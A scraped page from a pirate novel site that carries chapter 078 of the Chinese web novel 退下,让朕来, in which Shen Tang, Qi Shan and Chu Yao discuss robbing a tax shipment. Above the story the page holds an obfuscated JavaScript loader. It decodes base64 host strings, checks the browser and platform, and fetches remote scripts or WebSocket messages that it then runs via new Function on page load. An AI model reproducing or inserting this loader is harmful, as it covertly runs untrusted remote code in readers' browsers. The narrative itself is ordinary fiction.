笔趣阁

字:
关灯 护眼
笔趣阁 > 退下,让朕来 > 078:不够变态的我跟你们格格不入
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

078:不够变态的我跟你们格格不入

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
四宝郡三年税银,再加上郡守孝敬给郑乔的各式宝贝,那是一笔多大的巨款?沈棠用脚指头想想也知道想打劫这笔钱会面临多么森严的守卫。
  
  心里装着事情,做事儿自然也心不在焉。
  
  她的反常都被褚曜看在眼里。
  
  “五郎可是心里有事?”
  
  沈棠啊了一声,下意识看了一眼祈善,眼神征求对方同意。虽说祈善将褚曜也纳入计划,但毕竟是劫税银、关乎身家性命的大事情,自然要经过祈善本人许可才能说给第三者。
  
  褚曜也疑惑地看向了祈善。
  
  这厮趁自己不在,跟五郎说了什么?
  
  祈善垂着头,耐心喂怀中的素商进食,笑道:“一桩小事,沈小郎君自己拿主意。”
  
  沈棠扯了扯嘴角。
  
  劫税银可是凌迟起步的重罪,搁在祈元良口中居然是小事,这让沈棠好奇他跟着前面几任老板都干了啥事情,对作死这般习以为常。
  
  既然祈善让她自己拿主意,她便说了。
  
  “元良想要效仿梁山好汉打劫生辰纲一样劫了四宝郡的税银。”她指了指祈善,直言这是祈善的主意,顿了顿,吐槽道,“生辰纲就是一批生日礼物,安保程度跟税银没得比。”
  
  祈善头铁心大,一上来就是地狱难度。
  
  她以为褚曜也会被吓一跳,劝他们不要作死,谁知他的态度竟是稀松平常,仿佛沈棠说的不是劫税银而是出门买了个菜。之后还将视线转向祈善,而祈善也恰好抬头与之对视。
  
  二人无声地交换了眼色。
  
  褚曜垂下眼睑,淡声:“原来是这事。”
  
  沈棠一噎:“什么叫‘原来是这事’?”
  
  合着褚曜也是知情者?
  
  沈棠将心思坦诚地写在脸上,褚曜摇头:“我也是第一次听到这消息,此前并不知情。”
  
  沈棠又是一噎,吐槽道:“第一次知道?但无晦反应未免过于镇定,很难有说服力。”
  
  褚曜道:“在下只是觉得——这是祈元良会做出来的事情,也的确是个不错的主意。”
  
  有心理准备,所以没了惊讶的必要。
  
  沈棠:“……”
  
  一时间,有些怀疑人生——她是因为不够变【态】、反涩会而跟祈善几个格格不入?
  
  看着沈棠几乎飘着回房间,祈善露出些许看热闹不嫌事儿大的笑容,看得褚曜很堵心。
  
  他道:“你这是什么意思?”
  
  祈善没装傻充愣。
  
  布下言灵“法不传六耳”,防止有人窃听,才道:“褚无晦,空有国玺却无根基和实力,不过是任人宰割的砧板之鱼!沈幼梨莫说根基了,甚至连野心都无,可不就得推一把?”
  
  他强调道:“所以这笔税银很重要。”
  
  褚曜没有阻拦,他只问一个问题。
  
  “你有把握?”
  
  祈善道:“五成。”
  
  这个把握比例已经不低了。
  
  只是——
  
  褚曜:“倘若不慎失手……”
  
  祈善用手指戳着素商的粉色肉垫,薄凉笑道:“那便失手,税银到不到手并不重要。以沈幼梨的诸侯之道,注定他日后缺什么都不会缺粮少米。这世道最不值钱的就是人力,收留流民帮忙耕种,总会经营起来。而有了这笔税银,不过是节省这部分的精力。”
  
  褚曜倒是闻弦歌而知雅意。
  
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师